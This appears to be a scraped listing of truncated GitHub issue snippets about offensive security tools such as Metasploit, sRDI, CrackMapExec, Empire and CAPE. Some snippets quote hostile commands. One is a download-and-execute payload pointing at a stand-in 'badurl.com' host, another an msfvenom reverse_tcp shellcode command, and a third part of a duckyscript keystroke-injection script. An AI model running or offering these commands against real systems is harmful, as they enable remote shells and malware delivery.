-
Hi
i have question
how can change the exe or other payload formats to ./sc.exe for example
exe to ./exe
or b.dll to ./b.dll
Thanks
regards
-
Hi,
I want to use sRDI to convert a DLL that is managed code (_.Net C#_) with an exported function (_using DllExport from RGiesecke.DllExport_) to be used from unmanaged code. I need to call this …
-
hello i getting warning and my .exe is only 32 kb.
i am using: `windows/download_exec exe=test.exe url=http://badurl.com/payload.exe`
[!] WARNING. WARNING. Length of the payload is above command l…
-
Right now the shellcode uses blockapi blobs, which makes enabling features like retries, etc. kind of awkward. It would be nice to convert these so they are easier to tweak and enhance on the fly.
-
## Steps to reproduce
1. Use the met_inject module in an attempt to spawn a meterpreter shell on a system
2. Receive a length error and cme hangs.
## Command string used
cme --verbose smb -…
-
Requesting config extraction for Ursnif. I am able to get the final Ursnif payload that's injected into Explorer.exe using CAPE extraction and a yara rule. I've done some RE and have the functions tha…
enzok updated
6 years ago
-
You can follow this tutorial to inject a meterpreter DLL using FuzzBunch:
http://www.hackingtutorials.org/exploit-tutorials/exploiting-eternalblue-for-shell-with-empire-msfconsole/
It would be nic…
timwr updated
7 years ago
-
The original duckyscript code
DELAY 5000
GUI r
DELAY 500
STRING cmd
ENTER
STRING cd %TEMP%
ENTER
STRING copy con met.cmd
ENTER
STRING start C:/Windows/System32/Ribbons.scr /s
ENTER
STRING powershell…
-
first thanks for this great job , i'm generating shellcode using msfvenom like this:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=6667 -b '\x41\x41' -f hex
but i ha…
ghost updated
7 years ago
-
## Empire Version
1.5
## OS Information (Linux flavor, Python version)
Attacker: Kali Rolling, Python 2.7.12rc1
Victim: Win 10 Pro x86, Win7 Ent x64
## Expected behavior and description of the error…